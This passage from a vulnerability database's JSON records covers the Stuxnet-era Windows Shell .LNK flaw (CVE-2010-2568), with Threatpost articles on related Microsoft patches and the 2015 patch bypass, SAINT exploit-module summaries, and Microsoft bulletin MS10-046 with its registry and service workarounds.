
FREAK forces systems to downgrade the key length of an RSA key to a crackable 512 bits, enabling a man-in-the-middle attack putting supposedly encrypted traffic at risk.\n\nInitially, it was believed that FREAK was confined to certain SSL clients, including OpenSSL, but Microsoft released an advisory on March 5 warning about Schannel\u2019s exposure.\n\n\u201cThe security update addresses the vulnerability by correcting the cipher suite enforcement policies that are used when server keys are exchanged between servers and client systems,\u201d Microsoft said.\n\nOf the remaining bulletins, all of which are rated important by Microsoft, [MS15-027](<https://technet.microsoft.com/library/security/MS15-027>) merits attention. The bulletin patches a vulnerability in Windows Netlogon by modifying the way it handles secure channels.\n\n\u201cThe vulnerability could allow spoofing if an attacker who is logged on to a domain-joined system runs a specially crafted application that could establish a connection with other domain-joined systems as the impersonated user or system,\u201d Microsoft said in its advisory, adding that the severity is lessened because an attacker would have to be logged on to a domain-joined system and be able to observe network traffic.\n", "modified": "2015-03-13T19:53:47", "published": "2015-03-10T14:24:37", "id": "THREATPOST:519B278A52BA4200692386F6FAEA43B1", "href": "https://threatpost.com/microsoft-patches-old-stuxnet-bug-freak-vulnerability/111565/", "type": "threatpost", "title": "March 2015 Microsoft Patch Tuesday Security Bulletins", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:26", "bulletinFamily": "info", "cvelist": ["CVE-2010-2568", "CVE-2015-1769", "CVE-2017-11882"], "description": "It used to be that dropping a USB stick in a parking lot in the hope that someone plugs the malicious peripheral into an important computer was the realm of penetration 
testers and ambitious nation-state actors.\n\nThat\u2019s just not so anymore. The practice has gone mainstream, even infiltrating [popular hacker dramas](<http://www.imdb.com/title/tt4158110/>) on television.\n\nMicrosoft yesterday patched a vulnerability, [MS15-085](<https://technet.microsoft.com/library/security/ms15-085>), in Windows [Mount Manager](<https://msdn.microsoft.com/en-us/library/Aa940165%28v=WinEmbedded.5%29.aspx>), a driver in mountmgr.sys that assigns drive letters for dynamic and basic disk volumes. The flaw, Microsoft said, is being exploited in targeted attacks and [patching this vulnerability](<https://threatpost.com/microsoft-patches-critical-vulnerabilities-in-new-edge-browser/114226>) should be prioritized.\n\nMicrosoft rated the vulnerability (CVE-2015-1769) \u201cimportant\u201d because it requires local access to a machine to exploit. But that shouldn\u2019t diminish the importance of the vulnerability, experts said.\n\n\u201cEven in an otherwise locked down, unprivileged environment, this vulnerability can allow an attacker to run malicious code on a system if they can gain access to a USB port,\u201d said Bobby Kuzma, systems engineer at Core Security. \u201cThankfully, since this attack does require physical access to a system, its impact is limited to specific environments and circumstances.\u201d\n\nThe most notorious instance of advanced attackers moving malware over USB drives is of course Stuxnet. 
Attackers used USBs to infect computers with the malware at the Natanz uranium enrichment facility in Iran; Stuxnet-infected machines spread the malware to USBs and other peripherals connected to the computer in the hopes of spreading the attack to air-gapped machines.\n\nThis vulnerability is different, said Craig Young, a security researcher with Tripwire.\n\n\u201cThis flaw allows someone with physical access to an unlocked machine to use the USB drive as an avenue to write files where the user normally could not,\u201d Young said. \u201cThis makes [elevation of privilege] easy since DLLs can be written to system locations and in general executables run as SYSTEM should be replaceable with attacker code.\u201d\n\nStuxnet exploited, among other vulnerabilities, a flaw in the Windows Shell that allowed local users and remote attackers to execute code using a [malicious .LNK shortcut file](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2568>). The vulnerability occurs because the .LNK files are not properly handled during icon display in Windows Explorer and in Siemens WinCC SCADA systems. The malware executes by merely visiting a directory hosting the .LNK file.\n\nThe .LNK vulnerability was also exploited by the Equation Group, uncovered by researchers at Kaspersky Lab, via the [Fanny worm](<https://threatpost.com/massive-decades-long-cyberespionage-framework-uncovered/111080>). Fanny exploits two zero days also used by Stuxnet and also spread over USB sticks to air-gapped computers.\n\nIn March, [Microsoft patched the .LNK-related vulnerability again](<https://threatpost.com/patched-windows-machines-exposed-to-stuxnet-lnk-flaw-all-along/111558>) after German researcher Michael Heerklotz discovered that the original patch from August 2010 was incomplete. Heerklotz reported the bug to HP\u2019s Zero Day Initiative, which said that Windows users had been exposed all along. 
Heerklotz said he found a way to [bypass Microsoft\u2019s patch by attacking other parts of the .LNK code](<https://threatpost.com/details-surface-on-stuxnet-patch-bypass/111579>) that were not checked by the original patch.\n\nThe Mount Manager vulnerability patched yesterday is not remotely exploitable. It does allow for elevation of privilege and affects supported Windows systems, including Windows 10.\n\n\u201cThis particular vulnerability is a great illustration of the security precept \u2018If I can touch your computer, it\u2019s not your computer anymore,\u2019\u201d Kuzma said. \u201cIt\u2019s important for organizations to think about the physical security of their systems, and the access controls to prevent unauthorized users from gaining access to them. A review of policies and controls surrounding outside USB media might be a good idea.\u201d\n\nMicrosoft announced that in addition to the patch it was also making an event log available that detects attacks against this vulnerability.\n\n\u201cThe event log will be triggered every time a malicious USB that relies on this vulnerability is mounted on the system. If such an event is recorded, it means that an attempt to exploit the vulnerability is blocked,\u201d Microsoft said in a [blog post](<http://blogs.technet.com/b/srd/archive/2015/08/11/defending-against-cve-2015-1769-a-logical-issue-exploited-via-a-malicious-usb-stick.aspx>). \u201cSo once the update is installed, companies auditing event logs will be able to use this as a detection mechanism. 
These events are logged under the \u2018System\u2019 channel and are reported as an error.\u201d\n", "modified": "2015-08-13T18:37:32", "published": "2015-08-12T10:49:23", "id": "THREATPOST:FB6C6CE8F3B4AE6846C8AB866C36F024", "href": "https://threatpost.com/microsoft-patches-usb-related-flaw-used-in-targeted-attacks/114240/", "type": "threatpost", "title": "Microsoft Patches USB-Related Flaw Used in Targeted Attacks", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:13", "bulletinFamily": "info", "cvelist": ["CVE-2010-2568", "CVE-2015-0096", "CVE-2017-11882"], "description": "It took 10 hours to find what had eluded others for close to five years.\n\nGerman computer science student Michael Heerklotz spent the Christmas holiday reading _Countdown to Zero Day_, a narrative on the discovery and impact of Stuxnet, the computer worm considered one of the first cyberweapons, and which is accused of putting a serious dent in Iran\u2019s development of nuclear weaponry.\n\nThe book inspired the University of Augsburg student to examine Stuxnet, specifically [the .LNK vulnerability in the Windows shell](<https://threatpost.com/patched-windows-machines-exposed-to-stuxnet-lnk-flaw-all-along/111558>) that was exploited during the hack of the Natanz uranium enrichment facility.\n\nMicrosoft had patched the flaw in August 2010, and in the four-plus years since, no public reports of problems with the patch or residual effects from the vulnerability were ever heard. It was assumed that Windows machines that were patched against CVE-2010-2568 were in the clear.\n\n\u201cI wanted to take a closer look at the .LNK vulnerability by testing it on an old Windows XP installation, and then trying to figure out what Microsoft did to fix it,\u201d Heerklotz said in an email to Threatpost. 
\u201cAmazingly, after about 10 hours, I found a way to bypass the fix, by abusing other parts of the .LNK code which Microsoft most likely did not check too carefully when they created the patch.\u201d\n\nHeerklotz reported in January what he\u2019d found to HP\u2019s Zero Day Initiative, a vulnerability disclosure program originally started by TippingPoint before it was acquired by HP. The program vets vulnerabilities, creates proof-of-concept code, and eventually shares its findings with the affected vendor while paying out a bounty to the researcher and giving its customers first dibs on a fix.\n\nYesterday, [HP disclosed intimate details](<http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBPd-G0CL2>) of what Heerklotz had discovered, hours after [Microsoft produced a patch that took care of the Stuxnet bug](<https://threatpost.com/microsoft-patches-old-stuxnet-bug-freak-vulnerability/111565>)\u2014again.\n\n\u201cIt was a bit tricky, but not too complicated, and it puzzles me that nobody discovered (and published) it earlier,\u201d Heerklotz said. 
\u201c[Other researchers have looked at the patch](<http://www.lexsi-leblog.com/cert-en/how-microsoft-fixed-the-lnk-vulnerability-and-other-things.html>), too, but I guess nobody invested too much time, because everything seemed to be OK.\u201d\n\nThe [.LNK vulnerability](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2568>) was part of Stuxnet\u2019s arsenal as it went after Iran\u2019s nuclear program with a barrage of zero-day exploits targeting Windows vulnerabilities, as well as shortcomings with Siemens programmable logic controllers (PLCs) in charge of centrifuge operations inside Natanz.\n\n\u201cThat patch didn\u2019t completely address the .LNK issue in the Windows shell, and there were weaknesses left behind that have been resolved in this patch,\u201d said Brian Gorenc, manager of vulnerability research with ZDI. Gorenc said the vulnerability works on Windows machines going back to Windows XP through Windows 8.1, and the proof of concept exploit developed by Heerklotz and tweaked by ZDI evades the validation checks put in place by the original Microsoft security bulletin.\n\nFrom a high level, Stuxnet was launched after a USB drive was inserted into an air-gapped machine at the facility that was loaded with an exploit for a Windows vulnerability that would execute when a user browsed a directory or folder containing the .LNK exploit, HP said.\n\n\u201cWindows allowed for .LNK files, which define shortcuts to other files or directories, to use custom icons from .CPL (Control Panel) files. The problem is that in Windows, icons are loaded from modules (either executables or dynamic link-libraries). In fact, .CPL files are actually DLLs,\u201d HP said in its advisory. 
\u201cBecause an attacker could define which executable module would be loaded, an attacker could use the .LNK file to execute arbitrary code inside of the Windows shell and do anything the current user could.\u201d\n\nMicrosoft\u2019s answer in the August 2010 patch was to whitelist which .CPL files could load non-standard icons for links.\n\nHP explains the bypass in detail in its [advisory](<http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBPd-G0CL2>), adding that for all of its necessary investments in memory corruption attack mitigations, Microsoft paid in this instance for a 10-year-old decision to load such shortcut icons by loading executable modules into the process.\n\n\u201cThe Windows operating system itself will handle resolving ASLR and loading the attack into executable memory. And because of that, the attack is stable, reliable, and works cleanly across Windows versions. Microsoft has gone to a great deal of effort to make exploitation of memory corruption bugs more difficult,\u201d HP said. 
\u201cThis is a classic example of the Defender\u2019s Dilemma \u2014 the defender must be strong everywhere, while the attacker needs to find only one mistake.\u201d\n", "modified": "2015-03-11T17:01:47", "published": "2015-03-11T13:01:47", "id": "THREATPOST:BB95F65906A69148A31A208D15B5EFC3", "href": "https://threatpost.com/details-surface-on-stuxnet-patch-bypass/111579/", "type": "threatpost", "title": "Details Surface on Stuxnet Patch Bypass", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2016-10-03T15:01:53", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-2568"], "description": "Added: 07/22/2010 \nCVE: [CVE-2010-2568](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2568>) \nBID: [41732](<http://www.securityfocus.com/bid/41732>) \nOSVDB: [66387](<http://www.osvdb.org/66387>) \n\n\n### Background\n\nMicrosoft Windows supports LNK files, also known as shortcuts, which are references to other files. Shortcuts can be placed in a location which is convenient for users (such as the Desktop or Start menu), from which they can be used to execute the referenced file. \n\n### Problem\n\nA design weakness in the Windows shell allows command execution when a user opens a shortcut file containing a CONTROL item which specifies a malicious executable DLL. The shortcut file could be given to the user on removable media such as a USB flash drive. \n\n### Resolution\n\nSee [Microsoft Security Advisory 2286198](<http://www.microsoft.com/technet/security/advisory/2286198.mspx>) for patch information or workarounds. \n\n### References\n\n<http://www.kb.cert.org/vuls/id/940193> \n\n\n### Limitations\n\nThe specified SMB share must be accessible by the target user. Before the exploit can succeed, download the exploit.dll file and place it on the specified share. \n\nThe user must double-click on the shortcut file in order for this exploit to succeed. 
\n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2010-07-22T00:00:00", "published": "2010-07-22T00:00:00", "id": "SAINT:23F1F2BDDAAD19D660289BACF901A811", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/windows_shell_lnk_control", "type": "saint", "title": "Windows Shell LNK file CONTROL item command execution", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T17:19:45", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-2568"], "edition": 2, "description": "Added: 07/22/2010 \nCVE: [CVE-2010-2568](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2568>) \nBID: [41732](<http://www.securityfocus.com/bid/41732>) \nOSVDB: [66387](<http://www.osvdb.org/66387>) \n\n\n### Background\n\nMicrosoft Windows supports LNK files, also known as shortcuts, which are references to other files. Shortcuts can be placed in a location which is convenient for users (such as the Desktop or Start menu), from which they can be used to execute the referenced file. \n\n### Problem\n\nA design weakness in the Windows shell allows command execution when a user opens a shortcut file containing a CONTROL item which specifies a malicious executable DLL. The shortcut file could be given to the user on removable media such as a USB flash drive. \n\n### Resolution\n\nSee [Microsoft Security Advisory 2286198](<http://www.microsoft.com/technet/security/advisory/2286198.mspx>) for patch information or workarounds. \n\n### References\n\n<http://www.kb.cert.org/vuls/id/940193> \n\n\n### Limitations\n\nThe specified SMB share must be accessible by the target user. Before the exploit can succeed, download the exploit.dll file and place it on the specified share. \n\nThe user must double-click on the shortcut file in order for this exploit to succeed. 
\n\n### Platforms\n\nWindows \n \n\n", "modified": "2010-07-22T00:00:00", "published": "2010-07-22T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/windows_shell_lnk_control", "id": "SAINT:0083688CA07FA21D6F4D1102BD0550AB", "type": "saint", "title": "Windows Shell LNK file CONTROL item command execution", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:35", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-2568"], "description": "Added: 07/22/2010 \nCVE: [CVE-2010-2568](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2568>) \nBID: [41732](<http://www.securityfocus.com/bid/41732>) \nOSVDB: [66387](<http://www.osvdb.org/66387>) \n\n\n### Background\n\nMicrosoft Windows supports LNK files, also known as shortcuts, which are references to other files. Shortcuts can be placed in a location which is convenient for users (such as the Desktop or Start menu), from which they can be used to execute the referenced file. \n\n### Problem\n\nA design weakness in the Windows shell allows command execution when a user opens a shortcut file containing a CONTROL item which specifies a malicious executable DLL. The shortcut file could be given to the user on removable media such as a USB flash drive. \n\n### Resolution\n\nSee [Microsoft Security Advisory 2286198](<http://www.microsoft.com/technet/security/advisory/2286198.mspx>) for patch information or workarounds. \n\n### References\n\n<http://www.kb.cert.org/vuls/id/940193> \n\n\n### Limitations\n\nThe specified SMB share must be accessible by the target user. Before the exploit can succeed, download the exploit.dll file and place it on the specified share. \n\nThe user must double-click on the shortcut file in order for this exploit to succeed. 
\n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2010-07-22T00:00:00", "published": "2010-07-22T00:00:00", "id": "SAINT:D73D956898E75970CBB67DF23C41B8A0", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/windows_shell_lnk_control", "title": "Windows Shell LNK file CONTROL item command execution", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:38", "bulletinFamily": "software", "cvelist": ["CVE-2010-2568"], "description": "Code execution on shortcut icon displaying.", "edition": 1, "modified": "2010-08-03T00:00:00", "published": "2010-08-03T00:00:00", "id": "SECURITYVULNS:VULN:11026", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11026", "title": "Microsoft Windows shortcuts code execution", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:36", "bulletinFamily": "software", "cvelist": ["CVE-2010-2568"], "description": "Microsoft Security Bulletin MS10-046 - Critical\r\nVulnerability in Windows Shell Could Allow Remote Code Execution (2286198)\r\nPublished: August 02, 2010\r\n\r\nVersion: 1.0\r\nGeneral Information\r\nExecutive Summary\r\n\r\nThis security update resolves a publicly disclosed vulnerability in Windows Shell. The vulnerability could allow remote code execution if the icon of a specially crafted shortcut is displayed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nThis security update is rated Critical for all supported editions of Microsoft Windows. 
For more information, see the subsection, Affected and Non-Affected Software, in this section.\r\n\r\nThe security update addresses the vulnerability by correcting validation of shortcut icon references. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.\r\n\r\nThis security update addresses the vulnerability first described in Microsoft Security Advisory 2286198.\r\n\r\nRecommendation. The majority of customers have automatic updating enabled and will not need to take any action because this security update will be downloaded and installed automatically. Customers who have not enabled automatic updating need to check for updates and install this update manually. For information about specific configuration options in automatic updating, see Microsoft Knowledge Base Article 294871.\r\n\r\nFor administrators and enterprise installations, or end users who want to install this security update manually, Microsoft recommends that customers apply the update immediately using update management software, or by checking for updates using the Microsoft Update service.\r\n\r\nSee also the section, Detection and Deployment Tools and Guidance, later in this bulletin.\r\n\r\nKnown Issues. None\r\n\r\nAffected and Non-Affected Software\r\n\r\nThe following software has been tested to determine which versions or editions are affected. Other versions or editions are either past their support life cycle or are not affected. 
To determine the support life cycle for your software version or edition, visit Microsoft Support Lifecycle.\r\n\r\nAffected Software\r\nOperating System\tMaximum Security Impact\tAggregate Severity Rating\tBulletins Replaced by this Update\r\nWindows XP Service Pack 3\tRemote Code Execution\tCritical\tNone\r\nWindows XP Professional x64 Edition Service Pack 2\tRemote Code Execution\tCritical\tNone\r\nWindows Server 2003 Service Pack 2\tRemote Code Execution\tCritical\tNone\r\nWindows Server 2003 x64 Edition Service Pack 2\tRemote Code Execution\tCritical\tNone\r\nWindows Server 2003 with SP2 for Itanium-based Systems\tRemote Code Execution\tCritical\tNone\r\nWindows Vista Service Pack 1 and Windows Vista Service Pack 2\tRemote Code Execution\tCritical\tNone\r\nWindows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2\tRemote Code Execution\tCritical\tNone\r\nWindows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2*\tRemote Code Execution\tCritical\tNone\r\nWindows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2*\tRemote Code Execution\tCritical\tNone\r\nWindows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2\tRemote Code Execution\tCritical\tNone\r\nWindows 7 for 32-bit Systems\tRemote Code Execution\tCritical\tNone\r\nWindows 7 for x64-based Systems\tRemote Code Execution\tCritical\tNone\r\nWindows Server 2008 R2 for x64-based Systems*\tRemote Code Execution\tCritical\tNone\r\nWindows Server 2008 R2 for Itanium-based Systems\tRemote Code Execution\tCritical\tNone\r\n\r\n*Server Core installation affected. This update applies, with the same severity rating, to supported editions of Windows Server 2008 or Windows Server 2008 R2 as indicated, whether or not installed using the Server Core installation option. For more information on this installation option, see the TechNet articles, Managing a Server Core Installation and Servicing a Server Core Installation. Note that the Server Core installation option does not apply to certain editions of Windows Server 2008 and Windows Server 2008 R2; see Compare Server Core Installation Options.\r\n\r\nFrequently Asked Questions (FAQ) Related to This Security Update\r\n\r\nWhere are the file information details? \r\nRefer to the reference tables in the Security Update Deployment section for the location of the file information details.\r\n\r\nHow are the Windows 7 Service Pack 1 Beta and Windows Server 2008 R2 Service Pack 1 Beta releases affected by this vulnerability? \r\nWindows 7 Service Pack 1 Beta and Windows Server 2008 R2 Service Pack 1 Beta are affected by the vulnerability described in this bulletin. Customers running these beta releases are encouraged to download and apply the update to their systems. Security updates are available from Microsoft Update and Windows Update. The security update is also available for download from the Microsoft Download Center.\r\n\r\nI am using an older release of the software discussed in this security bulletin. What should I do? \r\nThe affected software listed in this bulletin has been tested to determine which releases are affected. Other releases are past their support life cycle. 
For more information about the product lifecycle, visit the Microsoft Support Lifecycle Web site.\r\n\r\nIt should be a priority for customers who have older releases of the software to migrate to supported releases to prevent potential exposure to vulnerabilities. To determine the support lifecycle for your software release, see Select a Product for Lifecycle Information. For more information about service packs for these software releases, see Lifecycle Supported Service Packs.\r\n\r\nCustomers who require custom support for older software must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country in the Contact Information list, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. For more information, see the Microsoft Support Lifecycle Policy FAQ.\r\n\r\nVulnerability Information\r\n\r\nSeverity Ratings and Vulnerability Identifiers\r\n\r\nThe following severity ratings assume the potential maximum impact of the vulnerability. For information regarding the likelihood, within 30 days of this security bulletin's release, of the exploitability of the vulnerability in relation to its severity rating and security impact, please see the Exploitability Index in the August bulletin summary. 
For more information, see Microsoft Exploitability Index.\r\nVulnerability Severity Rating and Maximum Security Impact by Affected Software\r\nAffected Software\tShortcut Icon Loading Vulnerability - CVE-2010-2568\tAggregate Severity Rating\r\nWindows XP Service Pack 3\tCritical - Remote Code Execution\tCritical\r\nWindows XP Professional x64 Edition Service Pack 2\tCritical - Remote Code Execution\tCritical\r\nWindows Server 2003 Service Pack 2\tCritical - Remote Code Execution\tCritical\r\nWindows Server 2003 x64 Edition Service Pack 2\tCritical - Remote Code Execution\tCritical\r\nWindows Server 2003 with SP2 for Itanium-based Systems\tCritical - Remote Code Execution\tCritical\r\nWindows Vista Service Pack 1 and Windows Vista Service Pack 2\tCritical - Remote Code Execution\tCritical\r\nWindows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2\tCritical - Remote Code Execution\tCritical\r\nWindows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2*\tCritical - Remote Code Execution\tCritical\r\nWindows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2*\tCritical - Remote Code Execution\tCritical\r\nWindows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2\tCritical - Remote Code Execution\tCritical\r\nWindows 7 for 32-bit Systems\tCritical - Remote Code Execution\tCritical\r\nWindows 7 for x64-based Systems\tCritical - Remote Code Execution\tCritical\r\nWindows Server 2008 R2 for x64-based Systems*\tCritical - Remote Code Execution\tCritical\r\nWindows Server 2008 R2 for Itanium-based Systems\tCritical - Remote Code Execution\tCritical\r\n\r\n*Server Core installation affected. This update applies, with the same severity rating, to supported editions of Windows Server 2008 or Windows Server 2008 R2 as indicated, whether or not installed using the Server Core installation option. For more information on this installation option, see the TechNet articles, Managing a Server Core Installation and Servicing a Server Core Installation. Note that the Server Core installation option does not apply to certain editions of Windows Server 2008 and Windows Server 2008 R2; see Compare Server Core Installation Options.\r\n\r\nShortcut Icon Loading Vulnerability - CVE-2010-2568\r\n\r\nA remote code execution vulnerability exists in affected versions of Microsoft Windows. The vulnerability exists because Windows incorrectly parses shortcuts in such a way that malicious code may be executed when the operating system displays the icon of a malicious shortcut file. An attacker who successfully exploited this vulnerability could run arbitrary code as the logged-on user. This update addresses a vulnerability previously discussed in Microsoft Security Advisory 2286198.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-2568.\r\n\r\nMitigating Factors for Shortcut Icon Loading Vulnerability - CVE-2010-2568\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022 An attacker who successfully exploits this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\u2022 For the USB removable device attack vector, when AutoPlay is disabled, the user would manually have to launch Windows Explorer or a similar application and browse to the affected folder of the removable disk.\r\n\r\nWorkarounds for Shortcut Icon Loading Vulnerability - CVE-2010-2568\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022 Disable the displaying of icons for shortcuts\r\n\r\nNote See Microsoft Knowledge Base Article 2286198 to use the automated Microsoft Fix it solution to enable or disable this workaround. This Fix it solution requires a restart upon completion in order to be effective. This Fix it solution deploys the workaround, and thus has the same user impact. We recommend that administrators review the KB article closely prior to deploying this Fix it solution.\r\n\r\nNote Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. 
For information about how to edit the registry, view the "Changing Keys And Values" Help topic in Registry Editor (Regedit.exe) or view the "Add and Delete Information in the Registry" and "Edit Registry Data" Help topics in Regedt32.exe.\r\n\r\n1. Click Start, click Run, type Regedit in the Open box, and then click OK.\r\n2. Locate and then select the following registry key:\r\n\r\nHKEY_CLASSES_ROOT\lnkfile\shellex\IconHandler\r\n\r\n3. Click the File menu and then click Export.\r\n4. In the Export Registry File dialog box, enter LNK_Icon_Backup.reg and then click Save.\r\n\r\nNote This will create a backup of this registry key in the My Documents folder by default.\r\n\r\n5. Select the value (Default) on the right pane in the Registry Editor. Press Enter to edit the value of the key. Delete the value, so that the value is blank, and press Enter.\r\n6. Locate and then select the following registry key:\r\n\r\nHKEY_CLASSES_ROOT\piffile\shellex\IconHandler\r\n\r\n7. Click the File menu and then click Export.\r\n8. In the Export Registry File dialog box, enter PIF_Icon_Backup.reg and then click Save.\r\n\r\nNote This creates a backup of this registry key in the My Documents folder by default.\r\n\r\n9. Select the value (Default) on the right pane in the Registry Editor. Press Enter to edit the value of the key. Delete the value, so that the value is blank, and press Enter.\r\n10. Log all users off and on again, or restart the computer.\r\n\r\nImpact of workaround. Disabling icons from being displayed for shortcuts prevents the issue from being exploited on affected systems. When this workaround is implemented, the system may display most icons as a "white" default object icon, which does impact usability. We recommend that system administrators test this workaround thoroughly prior to deployment. 
When the workaround is undone, all icons will reappear.\r\n\r\nHow to undo the workaround.\r\n\r\nUsing the interactive method\r\n\r\n1. Click Start, click Run, type Regedit in the Open box, and then click OK.\r\n2. Click the File menu and then click Import.\r\n3. In the Import Registry File dialog box, select LNK_Icon_Backup.reg, and then click Open.\r\n4. Click the File menu and then click Import.\r\n5. In the Import Registry File dialog box, select PIF_Icon_Backup.reg, and then click Open.\r\n6. Exit Registry Editor, and then restart the computer.\r\n\r\nManually resetting the Registry key values to the default values\r\n\r\n1. Click Start, click Run, type Regedit in the Open box, and then click OK.\r\n2. Locate and then click the following registry key:\r\n\r\nHKEY_CLASSES_ROOT\lnkfile\shellex\IconHandler\r\n\r\n3. Reset the registry key value to:\r\n\r\n{00021401-0000-0000-C000-000000000046}\r\n\r\n4. Locate and then click the following registry key:\r\n\r\nHKEY_CLASSES_ROOT\piffile\shellex\IconHandler\r\n\r\n5. Reset the registry key value to:\r\n\r\n{00021401-0000-0000-C000-000000000046}\r\n\r\n6. Restart the computer.\r\n\u2022 Disable the WebClient service\r\n\r\nDisabling the WebClient service helps protect affected systems from attempts to exploit this vulnerability by blocking the most likely remote attack vector through the Web Distributed Authoring and Versioning (WebDAV) client service. 
After applying this workaround it is still possible for remote attackers who successfully exploit this vulnerability to cause Microsoft Office Outlook to run programs located on the targeted user's computer or the Local Area Network (LAN), but users will be prompted for confirmation before opening arbitrary programs from the Internet.\r\n\r\nTo disable the WebClient Service, follow these steps:\r\n\r\n1. Click Start, click Run, type Services.msc and then click OK.\r\n2. Right-click WebClient service and select Properties.\r\n3. Change the Startup type to Disabled. If the service is running, click Stop.\r\n4. Click OK and exit the management application.\r\n\r\nImpact of workaround. When the WebClient service is disabled, Web Distributed Authoring and Versioning (WebDAV) requests are not transmitted. In addition, any services that explicitly depend on the Web Client service will not start, and an error message will be logged in the System log. For example, WebDAV shares will be inaccessible from the client computer.\r\n\r\nHow to undo the workaround.\r\n\r\nTo re-enable the WebClient Service, follow these steps:\r\n\r\n1. Click Start, click Run, type Services.msc and then click OK.\r\n2. Right-click WebClient service and select Properties.\r\n3. Change the Startup type to Automatic. If the service is not running, click Start.\r\n4. Click OK and exit the management application.\r\n\u2022 Block the download of LNK and PIF files from the Internet\r\n\r\nBlocking the download of LNK and PIF files on the Internet Gateway provides protection against remote exploitation of these attacks. 
Note that the files can be transferred over WebDAV, so any blocking solution should take this protocol into account.\r\n\u2022 Block outbound SMB connections on the perimeter firewall\r\n\r\nBlocking outbound SMB connections on the perimeter firewall reduces the risk of remote exploitation using file shares.\r\n\r\nFAQ for Shortcut Icon Loading Vulnerability - CVE-2010-2568\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nWhat causes the vulnerability? \r\nWhen attempting to load the icon of a shortcut, the Windows Shell does not correctly validate specific parameters of the shortcut.\r\n\r\nWhat is the Windows Shell? \r\nThe Windows user interface (UI) provides users with access to a wide variety of objects necessary for running applications and managing the operating system. The most numerous and familiar of these objects are the folders and files that reside on computer disk drives. There are also a number of virtual objects that allow the user to perform tasks such as sending files to remote printers or accessing the Recycle Bin. The Shell organizes these objects into a hierarchical namespace and provides users and applications with a consistent and efficient way to access and manage objects.\r\n\r\nWhat is a shortcut? \r\nA shortcut is a link to a file or program, represented by an icon. If you double-click a shortcut, the file or program opens. The shortcut is a mechanism often used to keep frequently used files in a single, easily accessed location, such as a folder or the desktop. Shortcuts are implemented as files with the LNK extension. 
